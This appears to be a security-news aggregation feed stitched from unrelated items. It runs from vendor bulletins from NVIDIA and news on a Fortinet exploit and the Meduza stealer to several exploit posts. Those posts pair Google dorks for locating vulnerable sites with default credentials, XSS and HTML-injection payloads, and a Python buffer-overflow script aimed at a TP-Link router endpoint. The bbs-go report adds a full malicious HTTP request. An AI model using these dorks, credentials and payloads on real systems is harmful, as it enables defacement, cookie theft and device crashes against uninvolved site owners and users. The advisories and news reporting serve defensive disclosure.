ADMINA BULGARIA Ltd version 1.0 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : ADMINA BULGARIA Ltd v 1.0 Insecure Settings Vulnerability                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://admina.me/                                                                                                  |  | # Dork      : " ADMINA BULGARIA Ltd.. All Rights Reserved. ."                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] user : admina & pass : 0000[+] http://127.0.0.1/res-clusterorg/admina/ <====| LoginGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

ADMINA BULGARIA Ltd 1.0 Insecure Settings

Active Super Shop version 1.5.1 suffers from an html injection vulnerability.

    ====================================================================================================================================| # Title     : Active super shop v1 5.1 HTML inject Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://activeitzone.com/demo/shop/                                                                                |  | # Dork      : "Home || Active Super Shop"                                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Register new member .[+] go to edit your profil https://127.0.0.1/3woru/home/profile/[+] edit your profil , put your code or use this code for test in First Name case or Last Name or ...etc :<marquee><font color=lime size=32>Hacked by indoushka</font></marquee></tr><td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a></tr>Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh   |                                                                                                                                              |=======================================================================================================================================

Active Super Shop 1.5.1 HTML Injection

Aathesh Soft CMS version 0.3.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Aathesh Soft CMS v0.3.0 XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://aatheshsoft.com                                                                                            || # Dork      : intext:''Developed by Aathesh Soft Infotech Pvt Ltd''                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /search.php?search=e%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(939443)%3C/ScRiPt%3E[+] http://127.0.0.1/ryncoorchidscom/search.php?search=e%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(939443)%3C/ScRiPt%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Aathesh Soft CMS 0.3.0 Cross Site Scripting

Ariadna CMS version 0.3 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Ariadna CMS v.3 - XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : http://ariadna3.com                                                                                                |  | # Dork      : intext:''Powered by ariadna3.com''                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] click 2 creat a Nouveau RDV & use payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] https://127.0.0.1/www.aytoatecaes/turismo/fotografia-galerias.php?ID=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E ====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Ariadna CMS 0.3 Cross Site Scripting


NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where a guest OS may be able to control resources for which it is not authorized, which may lead to information disclosure and data tampering.



**Details**

This section provides a summary of potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors use CVSS v3.1 standards.

**NVIDIA GPU Display Driver**

**CVE ID**

**Description**

**Base Score**

**Vector**

CVE-2022-34671

NVIDIA GPU Display Driver for Windows contains a vulnerability in the user-mode layer, where an unprivileged user can cause an out-of-bounds write, which may lead to code execution, information disclosure, and denial of service.

8.5

CWE: 787  
AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE‑2023‑25515

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability where unexpected untrusted data is parsed, which may lead to code execution, denial of service, escalation of privileges, data tampering, or information disclosure.

7.8

CWE: 822  
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE‑2023‑25516

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where an unprivileged user can cause an integer overflow, which may lead to information disclosure and denial of service.

7.1

CWE: 190  
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

**NVIDIA vGPU Software**

**CVE ID**

**Description**

**Base Score**

**Vector**

CVE‑2023‑25517

NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where a guest OS may be able to control resources for which it is not authorized, which may lead to information disclosure and data tampering.

7.1

CWE: 285  
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends consulting a security or IT professional to evaluate the risk to your specific configuration.

**Security Updates for NVIDIA GPU Display Driver****CVE IDs Addressed in Each Windows Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

**Windows Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE-2022-34671, CVE‑2023‑25515

**Security Updates for NVIDIA GPU Windows Display Driver**

The following table lists the NVIDIA software products affected, Windows driver versions affected, and the updated version available from nvidia.com that includes this security update. Download the updates from the NVIDIA Driver Downloads page.

**Software Product**

**Operating System**

**Driver Branch**

**Affected Driver Versions**

**Updated Driver Version**

GeForce

Windows

R535

All driver versions prior to 536.23

536.23

Windows 10 and 11

R470

All drivers versions prior to 474.44 for support of GeForce Kepler desktop

474.44

Windows 7 and 8._x_

R470

All driver versions prior to 474.44

474.44

Studio

Windows

R535

All driver versions

Available the week of June 29, 2023

NVIDIA RTX, Quadro, NVS

Windows

R535

All driver versions prior to 536.25

536.25

R525

All driver versions prior to 529.11

529.11

R470

All driver versions prior to 474.44

474.44

Tesla

Windows

R535

All driver versions prior to 536.25

536.25

R525

All driver versions prior to 529.11

529.11

R470

All driver versions prior to 474.44

474.44

R450

All driver versions prior to 454.23

454.23

**CVE IDs Addressed in Each Linux Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux driver branch.

**Linux Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE‑2023‑25515, CVE‑2023‑25516

**Security Updates for NVIDIA GPU Linux Display Driver**

The following table lists the NVIDIA software products affected, Linux driver versions affected, and the updated version available from nvidia.com that includes this security update. Download the updates from the NVIDIA Driver Downloads page.

**Software Product**

**Operating System**

**Driver Branch**

**Affected Driver Versions**

**Updated Driver Version**

GeForce

Linux

R535

All driver versions prior to 535.54.03

535.54.03

R525

All driver versions prior to 525.125.06

525.125.06

R470

All driver versions prior to 470.199.02

470.199.02

NVIDIA RTX, Quadro, NVS

Linux

R535

All driver versions prior to 535.54.03

535.54.03

R525

All driver versions prior to 525.125.06

525.125.06

R470

All driver versions prior to 470.199.02

470.199.02

Tesla

Linux

R535

All driver versions prior to 535.54.03

535.54.03

R525

All driver versions prior to 525.125.06

525.125.06

R470

All driver versions prior to 470.199.02

470.199.02

R450

All driver versions prior to 450.248.02

450.248.02

**Notes**

*   Your computer hardware vendor may provide you with Windows GPU display driver versions including 536.19,531.87, 529.08, 574.44, and 454.23, which also contain the security updates.
*   The tables above may not be a comprehensive list of all affected supported versions or branch releases and may be updated as more information becomes available.
*   Earlier software branch releases that support these products may also be affected. If you are using an earlier branch release for which an update version is not listed above, upgrade to the latest branch release.

**Security Updates for NVIDIA vGPU Software****CVE IDs Addressed in Each Windows vGPU Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

**Windows Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE-2022-34671, CVE‑2023‑25515

**CVE IDs Addressed in Each Linux vGPU Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux vGPU driver branch

**Linux Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE‑2023‑25516

**CVE IDs Addressed in Each vGPU Manager Driver Branch**

The following table lists the CVE IDs addressed by the update in each vGPU Manager driver branch

**vGPU Manager Driver Branch**

**CVE IDs Addressed**

R535, R525

CVE‑2023‑25516, CVE‑2023‑25517

R470, R450

CVE‑2023‑25516

**Affected Products, Affected Versions, and Updated Versions**

The following table lists NVIDIA software products affected, versions affected, and the updated version that includes this security update.

**CVE IDs Addressed**

**Software Product**

**Operating System**

**Affected Versions**

Updated Version

**vGPU Software**

**Driver**

vGPU Software

Driver

CVE-2022-34671  
CVE‑2023‑25515

vGPU software (guest driver)

Windows

All versions prior to and including 15.2

528.89

15.3

529.11

All versions prior to and including 13.7

474.30

13.8

474.44

All versions prior to and including 11.12

454.14

11.13

454.23

CVE‑2023‑25516

vGPU software (guest driver)

Linux

All versions prior to and including 15.2

525.105.17

15.3

525.125.06

All versions prior to and including 13.7

470.182.03

13.8

470.199.02

All versions prior to and including 11.12

450.236.01

11.13

450.248.02

CVE‑2023‑25516  
CVE‑2023‑25517

vGPU software (Virtual GPU Manager)

Citrix Hypervisor, VMware vSphere, Red Hat Enterprise Linux KVM

All versions prior to and including 15.2

525.105.14

15.3

525.125.03

All versions prior to and including 13.7

470.182.02

13.8

470.199.03

All versions prior to and including 11.12

450.236.03

11.13

450.248.03

**Notes**

*   The table above may not be a comprehensive list of all affected supported versions or branch releases and may be updated as more information becomes available.
*   Earlier software branch releases that support these products may also be affected. If you are using an earlier branch release for which an update version is not listed above, upgrade to the latest branch release.

**Security Updates for NVIDIA Cloud Gaming****CVE IDs Addressed in Each Windows Cloud Gaming Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

**Windows Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE-2022-34671, CVE‑2023‑25515

**CVE IDs Addressed in Each Linux Cloud Gaming Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux Cloud Gaming driver branch

**Linux Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE-2022-34671, CVE‑2023‑25515

**CVE IDs Addressed in Each Cloud Gaming Manager Driver Branch**

The following table lists the CVE IDs addressed by the update in each Cloud Gaming Manager driver branch

**vGPU Manager Driver Branch**

**CVE IDs Addressed**

R535, R525

CVE‑2023‑25516, CVE‑2023‑25517

R470, R450

CVE‑2023‑25516

The following table lists the NVIDIA software products affected, versions affected, and the updated version that includes this security update.

**CVE IDs Addressed**

**Software Product**

**Operating System**

**Affected Versions**

**Updated Version**

**Cloud Gaming Software**

**Driver**

**Cloud Gaming Software**

**Driver**

CVE-2022-34671  
CVE‑2023‑25515

NVIDIA Cloud Gaming (guest driver)

Windows

All versions prior to and including May 2023 release

All versions prior to 531.79

June 2023 release

536.25

CVE‑2023‑25516

NVIDIA Cloud Gaming (guest driver)

Linux

All versions prior to and including May 2023 release

All versions prior to 530.51

June 2023 release

535.54.03

CVE‑2023‑25516  
CVE‑2023‑25517

NVIDIA Cloud Gaming (Virtual GPU Manager)

Red Hat Enterprise Linux KVM

All versions prior to and including May 2023 release

All versions prior to 530.51

June 2023 release

535.54.06

**Acknowledgements**

NVIDIA thanks the following people for reporting these issues:

CVE-2022-34671: Piotr Bania - Cisco Talos

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

June 26, 2023

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Frequently Asked Questions (FAQs)**

How do I determine which NVIDIA display driver version is currently installed on my PC?

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2023-25517: NVIDIA Support




NVIDIA CUDA toolkit for Linux and Windows contains a vulnerability in the nvdisasm binary file, where an attacker may cause a NULL pointer dereference by providing a user with a malformed ELF file. A successful exploit of this vulnerability may lead to a partial denial of service.





**Details**

This section summarizes the potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors follow CVSS v3.1 standards.

**CVE ID**

**Description**

**Base Score**

**Vector and CWE**

CVE‑2023‑25523

NVIDIA CUDA toolkit for Linux and Windows contains a vulnerability in the nvdisasm binary file, where an attacker may cause a NULL pointer dereference by providing a user with a malformed ELF file. A successful exploit of this vulnerability may lead to a partial denial of service.

3.3

AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L  
CWE-476

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends evaluating the risk to your specific configuration.

**Security Updates**

The following table lists the software products and versions affected, and the updated version available from nvidia.com that includes this security update.

Download the update from the CUDA Toolkit Downloads page to apply the security update.

**CVEs Addressed**

**Software Product**

**Operating System**

**Affected Versions**

**Updated Version**

CVE‑2023‑25523

NVIDIA CUDA Toolkit

Linux, Windows

All versions prior to CUDA Toolkit v12.2

CUDA Toolkit v12.2

**Notes**

*   Earlier software releases of this product are also affected. If you are using an earlier release, upgrade to the latest release version.

**Acknowledgements**

NVIDIA thanks the following people for reporting these issues:

CVE‑2023‑25523: Jifan Xiao

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

June 29, 2023

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2023-25523: NVIDIA Support

TP-Link TL-WR940N version 4 suffers from a buffer overflow vulnerability.

    # Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : hardware# Dork : /userRpm/WanDynamicIpV6CfgRpm# Tested on: Windows/Linux# CVE : CVE-2023-36355import requests# Replace the IP address with the router's IProuter_ip = '192.168.0.1'# Construct the URL with the vulnerable endpoint and parameterurl = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='# Replace the payload with a crafted payload that triggers the buffer overflowpayload = 'A' * 5000  # Example payload, adjust the length as needed# Send the GET request with the crafted payloadresponse = requests.get(url + payload)# Check the response status codeif response.status_code == 200:    print('Buffer overflow triggered successfully')else:    print('Buffer overflow not triggered')

TP-Link TL-WR940N 4 Buffer Overflow

Cross Site Scripting vulnerability in mlogclub bbs-go v. 3.5.5. and before allows a remote attacker to execute arbitrary code via a crafted payload to the comment parameter in the article function.

**漏洞名称**  
bbs-go 存储式跨站脚本漏洞

**受影响实体版本号**  
bbs-go <= 3.5.5

**漏洞类型**  
存储式跨站脚本

**危害等级**  
高危

**漏洞简介**  
bbs-go是一个使用Go语言搭建的开源社区系统，采用前后端分离技术，Go语言提供api进行数据支撑，用户界面使用Nuxt.js进行渲染，后台界面基于element-ui。  
bbs-go存在存储式跨站脚本漏洞，该漏洞源于程序未正确处理来自用户的输入。用户注册后在文章评论处可以注入恶意javascript脚本，管理员在管理端-内容管理-文章管理处点击查看评论时触发恶意脚本，导致泄露cookie等信息。  
以下产品及版本受到影响：bbs-go <= 3.5.5  
bbs-go的下载地址：https://github.com/mlogclub/bbs-go

**漏洞验证**  
前置条件：用户注册登录  
步骤：

1.  运行bbs-go = 3.5.5环境
2.  配置burpsuite抓包
3.  前台注册一个用户test4：

4.  test4登录
5.  点击“文章”，找到一篇文章，或者自己发表一篇文章

6.  评论，输入payload:并发布

完整请求报文：  
POST /api/comment/create HTTP/1.1  
Host: 192.168.111.130:3000  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0  
Accept: application/json, text/plain, _/_  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
X-Client: bbs-go-site  
X-User-Token: 1c1c47cb70f447589944117cb339518b  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 100  
Origin: http://192.168.111.130:3000  
Connection: close  
Referer: http://192.168.111.130:3000/article/4  
Cookie: Hm\_lvt\_79b8ff82974d0769ef5c629e4cd46629=1677550437; Hm\_lpvt\_79b8ff82974d0769ef5c629e4cd46629=1677639532; Admin-Token=57581e925fad47688596c13f8a48803d; userToken=1c1c47cb70f447589944117cb339518b

entityType=article&entityId=4&content=%3Cimg%20src%20onerror%3Dalert%28123%29%3E&imageList=&quoteId=  
7\. 使用管理员账号admin/123456登录管理端，点击内容管理-文章管理，选择这篇文章，查看评论

触发XSS

**修复建议**  
bbs-go\\server\\controllers\\admin\\comment\_controller.go:71  
改为builder.Put("content", html.EscapeString(comment.Content))  
对comment.Content进行html实体编码可临时解决该漏洞。

CVE-2023-36222: bbs-go 存储式跨站脚本漏洞1 · Issue #206 · mlogclub/bbs-go

Some 340,000 FortiGate SSL VPN appliances remain exposed to the threat more than three weeks after Fortinet released firmware updates to address the issue.

Researchers have written exploit code for a critical remote code execution (RCE) vulnerability in Fortinet's FortiGate SSL VPNs that the vendor disclosed and patched in June 2023.

Bishop Fox's research team, which developed the exploit, has estimated there are some 340,000 affected FortiGate devices that are currently unpatched against the flaw and remain open to attack. That number is significantly higher than the 250,000 FortiGate devices that several researchers estimated were vulnerable to exploit when Fortinet first disclosed the flaw on June 12.

**Code Not Released Publicly — but There's a GIF**

"There are 490,000 affected \[FortiGate\] SSL VPN interfaces exposed on the internet, and roughly 69% of them are currently unpatched," Bishop Fox's director of capability development, Caleb Gross, wrote in a blog post on June 30. "You should patch yours now."

The heap-based buffer overflow vulnerability, tracked as CVE-2023-27997, affects multiple versions of FortiOS and FortiProxy SSL-VPN software. It gives an unauthenticated, remote attacker a way to execute arbitrary code on an affected device and take complete control of it. Researchers from French cybersecurity firm Lexfo who discovered the flaw assessed it as affecting every single SSL VPN appliance running FortiOS.

Bishop Fox has not released its exploit code publicly. But its blog post has a GIF of it in use. Gross described the exploit that Bishop Fox has developed as giving attackers a way to open an interactive shell they could use to communicate with an affected FortiGate appliance.

"This exploit very closely follows the steps detailed in the original blog post by Lexfo, though we had to take a few extra steps that were not mentioned in that post," Gross wrote. "The exploit runs in approximately one second, which is significantly faster than the demo video on a 64-bit device shown by Lexfo."

Fortinet issued firmware updates that addressed the issue on June 12. At the time, the company said the flaw affected organizations in government, manufacturing and other critical infrastructure sectors. Fortinet said it was aware of an attacker exploiting the vulnerability in a limited number of cases.

Fortinet cautioned about the potential for threat actors like those behind the Volt Typhoon cyber-espionage campaign to abuse CVE-2023-27997. Volt Typhoon is a China-based group that is believed to have established persistent access on networks belonging to US telecom companies and other critical infrastructure organizations, for stealing sensitive data and carrying out other malicious actions. The campaign so far has primarily used another, older Fortinet flaw (CVE-2022-40684) for initial access. But organizations should not discount the possibility of Volt Typhoon — and other threat actors — using CVE-2023-27997 either, Fortinet warned.

**Why Security Appliances Make Popular Targets**

CVE-2023-27997 is one of numerous critical Fortinet vulnerabilities that have been exposed. Like that of almost every other firewall and VPN vendor, Fortinet's appliances are a popular target for adversaries because of the access they provide to enterprise networks.

The US Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and others have issued multiple advisories in recent years about the need for organizations to promptly address vulnerabilities in these and other network devices because of the high attacker interest in them.

In June 2022, for instance, CISA warned of China-sponsored threat actors actively targeting unpatched vulnerabilities in network devices from a wide range of vendors. The advisory included a list of the most common of these vulnerabilities. The list included vulnerabilities in products from Fortinet, Cisco, Citrix, Netgear, Pulse, QNAP, and Zyxel.

Systems administrators should patch as quickly as possible, even though patching firmware can be a bit more cumbersome when dealing with appliances that run application gateways, says Timothy Morris, chief security adviser at Tanium. Often, appliances such as those from Fortinet face the perimeter and have very high-availability requirements, meaning they have tight windows for change.

"For most organizations, a certain amount of downtime is probably inevitable," Morris says. Vulnerabilities such as CVE-2023-27997 require the full firmware image to be reloaded, so there is a certain amount of time and risk involved, he adds. "Configurations have to be backed up and restored to make sure they are working as expected."

Researchers Develop Exploit Code for Critical Fortinet VPN Bug

By Deeba Ahmed
Meduza malware is being fiercely marketed across different Telegram channels, cybercrime and dark web forums.
This is a post from HackRead.com Read the original post: New Meduza Malware Targets Wallets, Passwords and Browsers on Windows

**Meduza authors are pushing the malware as a subscription-based service, offering plans for 1-month, 3-month, and lifetime access.**

Crimeware-as-a-Service (CaaS) operations have become the latest fad in the world of cybercrime, and the Meduza Malware is the newest weapon added to its ever-increasing arsenal.

Uptycs Threat researchers report that Meduza Stealer is under active development and boasts comprehensive data-stealing capabilities, along with advanced detection evasion techniques.

**How Was Meduza Stealer Discovered?**

Uptycs researchers discovered the Meduza malware while monitoring Telegram channels and Dark Web forums. Initial examination revealed that the stealer was developed by someone with the username Meduza. According to the malware admin, Meduza does not perform ransomware operations and only functions as an information stealer.

**Meduza Targets- Windows Systems and Browsers**

The malware is designed to target Windows-based systems and organizations. Currently, it targets ten countries and pilfers a wide range of system and browser data, from login credentials to browsing history, bookmarks, etc.

It also targets data stored by 2FA, crypto wallets, and password managers. All types of extensions are vulnerable to Meduza. Check out the list of countries it can and cannot target:

*   Russia
*   Kazakhstan
*   Belarus
*   Georgia
*   Turkmenistan
*   Uzbekistan
*   Armenia
*   Kyrgyzstan
*   Moldova
*   Tajikistan

**What Makes Meduza Unusual?**

Researchers noted that it has a “crafty” operational design since, unlike other common malware, Meduza’s binary doesn’t use obfuscation techniques, making it virtually undetectable. The malware administrator has employed highly sophisticated marketing tactics to generate hype and trust for Meduza malware.

“In a calculated move to gain trust and confidence, they have initiated static and dynamic scans of the Meduza stealer file using some of the industry’s most reputable antivirus software. Screenshots were then shared, demonstrating that this potent malware could evade detection by these top-tier antivirus solutions,” researchers wrote in the report published on June 30th, 2023.

This malware is being fiercely marketed across different cybercrime forums and Telegram channels. Most antivirus software cannot detect its binary dynamically and statically, making the situation much more problematic for security researchers. The pricing model for Meduza is the real game-changer.

The admin offers numerous subscription packages, such as 1-month, 3-month, and lifetime access plans, at competitive prices ($199 per month, $399 for a 3-month subscription, and $1,199 for a lifetime license).

The Meduza malware is being advertised on the infamous Russian cybercrime and hacker forum XSS.IS (Left) – Meduza author boasting about the malware’s AV-evading capabilities. (Images: Hackread.com)

Moreover, the stolen data is available on a user-friendly web panel. Subscribers can create customized binaries and access, download, and delete sensitive data, including IP addresses, geographical data, stored cookies, wallets, passwords, and OS build names directly from the panel.

**Meduza Data Stealing Capabilities**

After infecting the machine, the malware scans for geolocation data against a predefined list of excluded countries and aborts operations if a match is found. Meduza malware connects to its operator’s C2 server if it doesn’t match. It starts stealing data only after the connection is established. It steals data from various Windows APIs, including GetUserName, GetComputerName, GetCurrentHWProfile, and EnumDisplayDevices.

It also collects system build CPU computer details, execute path, geolocation, OS, RAM, hardware IDs, GPU, TimeZone, screenshot resolution, username, etc. It also collects browser info, miner’s registry info, password manager info, and installed games details, probably to gain extensive financial and personal data.

Meduza comes with a predefined browser list and checks the User Data folder to get browser-related data such as cookies, history, web data, login data for accounts, and local state. It also steals Telegram Desktop app data from these Windows Registry paths:

    HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C4A4AE8F-B9F7-4CC7-8A6C-BF7EEE87ACA5}_is1

What’s worse, Meduza malware is also capable of collecting data from 19 password managers, stealing clients, Discord, 95 web browsers, and 76 cryptocurrency wallet extensions.

To stay protected, you must keep the OS, browsers, and installed applications updated so that vulnerabilities are time patched and use stronger passwords.

1.  Legion SMS Hijacking Malware Sold on Telegram
2.  100k Hacked ChatGPT Accounts Sold on Dark Web
3.  Hackers Leak i2VPN Admin Credentials on Telegram
4.  Hackers Advertising New Info-Stealer Malware on Dark Web

Tag

#windows